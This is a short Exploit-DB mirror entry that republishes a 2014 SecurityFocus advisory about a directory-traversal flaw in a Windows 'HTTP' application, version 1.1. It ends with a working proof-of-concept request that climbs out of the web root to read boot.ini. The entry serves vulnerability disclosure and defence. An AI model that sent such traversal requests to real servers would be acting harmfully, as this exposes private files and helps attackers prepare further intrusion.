exploit-db-mirror/platforms/windows/remote/33852.txt
Offensive Security 3e99626f23 Updated 06_25_2014
2014-06-25 04:38:08 +00:00

9 lines
No EOL
498 B
Text
Executable file

source: http://www.securityfocus.com/bid/39590/info
The HTTP application is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to view arbitrary local files and directories within the context of the webserver. Information harvested may aid in launching further attacks.
HTTP 1.1 is vulnerable; other versions may also be affected.
GET /..\..\\..\..\\..\..\\..\..\\\boot.ini HTTP/1.0